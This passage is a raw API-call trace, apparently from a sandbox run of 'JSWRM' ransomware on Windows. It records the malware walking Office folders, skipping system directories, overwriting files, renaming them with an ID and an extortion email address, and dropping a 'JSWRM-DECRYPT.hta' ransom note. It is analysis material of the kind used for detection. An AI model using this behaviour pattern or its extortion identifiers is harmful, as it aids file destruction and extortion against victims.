[0102.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.417] CloseHandle (hObject=0x45c) returned 1 [0102.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0102.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0102.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0102.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0102.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0102.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0102.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.418] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows8.1-KB2999226-x64.msu" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows8.1-kb2999226-x64.msu"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows8.1-KB2999226-x64.msu.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows8.1-kb2999226-x64.msu.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0102.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0102.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0102.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0102.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0102.419] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7c37773, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7c37773, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7c37773, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x91809, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Windows8.1-KB2999226-x86.msu", cAlternateFileName="WINDOW~2.MSU")) returned 1 [0102.419] lstrcmpiW (lpString1="Windows8.1-KB2999226-x86.msu", lpString2=".") returned 1 [0102.419] lstrcmpiW (lpString1="Windows8.1-KB2999226-x86.msu", lpString2="..") returned 1 [0102.419] lstrcmpiW (lpString1="Windows8.1-KB2999226-x86.msu", lpString2="...") returned 1 [0102.419] lstrcmpiW (lpString1="Windows8.1-KB2999226-x86.msu", lpString2="windows") returned 1 [0102.419] lstrcmpiW (lpString1="Windows8.1-KB2999226-x86.msu", lpString2="recovery") returned 1 [0102.419] lstrcmpiW (lpString1="Windows8.1-KB2999226-x86.msu", lpString2="perflogs") returned 1 [0102.419] lstrcmpiW (lpString1="Windows8.1-KB2999226-x86.msu", lpString2="documents and settings") returned 1 [0102.419] lstrcmpiW (lpString1="Windows8.1-KB2999226-x86.msu", lpString2="$RECYCLE.BIN") returned 1 [0102.419] lstrcmpiW (lpString1="Windows8.1-KB2999226-x86.msu", lpString2="system volume information") returned 1 [0102.419] lstrcmpiW (lpString1="Windows8.1-KB2999226-x86.msu", lpString2="msocache") returned 1 [0102.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows8.1-KB2999226-x86.msu", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0102.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0102.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows8.1-KB2999226-x86.msu", cchWideChar=28, lpMultiByteStr=0x2413a8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows8.1-KB2999226-x86.msu", lpUsedDefaultChar=0x0) returned 28 [0102.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows8.1-KB2999226-x86.msu", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0102.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0102.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows8.1-KB2999226-x86.msu", cchWideChar=28, lpMultiByteStr=0x240f70, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows8.1-KB2999226-x86.msu", lpUsedDefaultChar=0x0) returned 28 [0102.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0102.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0102.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0102.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows8.1-KB2999226-x86.msu" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows8.1-kb2999226-x86.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.421] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=595977) returned 1 [0102.421] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0102.421] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0102.434] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.434] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0102.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.434] CloseHandle (hObject=0x45c) returned 1 [0102.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0102.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0102.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0102.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0102.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0102.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0102.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.435] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows8.1-KB2999226-x86.msu" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows8.1-kb2999226-x86.msu"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\Windows8.1-KB2999226-x86.msu.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\windows8.1-kb2999226-x86.msu.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0102.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0102.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0102.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0102.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0102.436] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7c37773, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7c37773, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7c37773, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x91809, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Windows8.1-KB2999226-x86.msu", cAlternateFileName="WINDOW~2.MSU")) returned 0 [0102.436] FindClose (in: hFindFile=0x231c40 | out: hFindFile=0x231c40) returned 1 [0102.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0102.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0102.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0102.436] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x222d6c3d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x222d6c3d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x222d6c3d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0102.436] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0102.436] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0102.436] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0102.436] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0102.436] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0102.436] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0102.436] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0102.436] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0102.436] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0102.436] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0102.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.436] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0102.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0102.436] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0102.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.436] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0102.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0102.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0102.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0102.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0102.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0102.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0102.437] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2687c83, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee308135, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xee308135, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Licenses16", cAlternateFileName="LICENS~1")) returned 1 [0102.437] lstrcmpiW (lpString1="Licenses16", lpString2=".") returned 1 [0102.437] lstrcmpiW (lpString1="Licenses16", lpString2="..") returned 1 [0102.437] lstrcmpiW (lpString1="Licenses16", lpString2="...") returned 1 [0102.437] lstrcmpiW (lpString1="Licenses16", lpString2="windows") returned -1 [0102.437] lstrcmpiW (lpString1="Licenses16", lpString2="recovery") returned -1 [0102.437] lstrcmpiW (lpString1="Licenses16", lpString2="perflogs") returned -1 [0102.437] lstrcmpiW (lpString1="Licenses16", lpString2="documents and settings") returned 1 [0102.437] lstrcmpiW (lpString1="Licenses16", lpString2="$RECYCLE.BIN") returned 1 [0102.437] lstrcmpiW (lpString1="Licenses16", lpString2="system volume information") returned -1 [0102.437] lstrcmpiW (lpString1="Licenses16", lpString2="msocache") returned -1 [0102.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0102.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0102.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0102.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0102.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217e00 [0102.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0102.437] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\jswrm-decrypt.hta")) returned 0xffffffff [0102.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217e00 | out: hHeap=0x1e0000) returned 1 [0102.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0102.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0102.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0102.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24c1d0 [0102.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0102.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0102.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217eb0 [0102.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0102.441] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0102.442] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.442] WriteFile (in: hFile=0x458, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0102.443] CloseHandle (hObject=0x458) returned 1 [0102.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217eb0 | out: hHeap=0x1e0000) returned 1 [0102.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0102.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0102.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0102.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0102.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0102.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217b40 [0102.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0102.445] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\jswrm-decrypt.hta")) returned 0x20 [0102.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217b40 | out: hHeap=0x1e0000) returned 1 [0102.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0102.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0102.445] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2687c83, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee308135, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x33b97b57, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0102.446] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0102.446] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2687c83, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee308135, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x33b97b57, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="..", cAlternateFileName="")) returned 1 [0102.449] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0102.449] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0102.449] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe282b673, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe282b673, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe2910498, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5127, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AccessR_Grace-ppd.xrm-ms", cAlternateFileName="ACCESS~3.XRM")) returned 1 [0102.449] lstrcmpiW (lpString1="AccessR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0102.449] lstrcmpiW (lpString1="AccessR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0102.449] lstrcmpiW (lpString1="AccessR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0102.449] lstrcmpiW (lpString1="AccessR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0102.449] lstrcmpiW (lpString1="AccessR_Grace-ppd.xrm-ms", lpString2="recovery") returned -1 [0102.449] lstrcmpiW (lpString1="AccessR_Grace-ppd.xrm-ms", lpString2="perflogs") returned -1 [0102.449] lstrcmpiW (lpString1="AccessR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned -1 [0102.449] lstrcmpiW (lpString1="AccessR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.449] lstrcmpiW (lpString1="AccessR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0102.449] lstrcmpiW (lpString1="AccessR_Grace-ppd.xrm-ms", lpString2="msocache") returned -1 [0102.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Grace-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0102.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0102.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Grace-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x241290, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 